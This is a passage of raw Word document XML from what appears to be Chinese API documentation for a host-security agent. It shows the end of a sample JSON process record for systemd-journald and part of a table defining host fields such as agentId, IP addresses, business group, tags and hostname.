      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":"qingteng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-journal",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pid":246,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path":"/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd-journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startArgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd-journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>state":"S</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uid":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"?",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "startTime":"2018-03-30 13:55:45",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "portCount":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "md5":"6d8a3cd92c02ba9ce4a1e677dbf23462",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>installByPm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "packageVersion":"229-4ubuntu17",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>packageName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "gid":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root":true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "dependencies":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>version":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groups":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sessionId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sessionName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>size":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ppid":1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060473CD"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745"/>
        <w:gridCol w:w="1181"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5611"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FC4262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3DB31F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1907A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A46942A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10AEDF96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60FDC812" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F97E63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78728755" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CBED33E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FBAEC09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70672FF7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02F13A3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B5374D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BB58D82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F029051" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01108CBF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A80DF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="672BB017" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="120F3E85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DDE37D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="11052F4A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F42EDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB6A5F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26098CEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57707A00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50D974BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EF3E2D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D51BAA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03727821" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59774D33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0441594E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41608759" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F353182" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26B90957" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23A82287" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27EE4F2E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A0BCB05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117855D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5080BB9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75AA78EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BF4AC48" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C604FFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E939D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F5C7EB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A760042" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71EA0362" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24822ADD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B3188F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C1E93C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="671D80FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DA788CA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3990BD83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C32EA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE0500B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6B9E5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="423D4E89" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3784E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF24B63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D42FB05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DA4B194" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E43F115" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44FABA75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61CFE86D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00149A35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
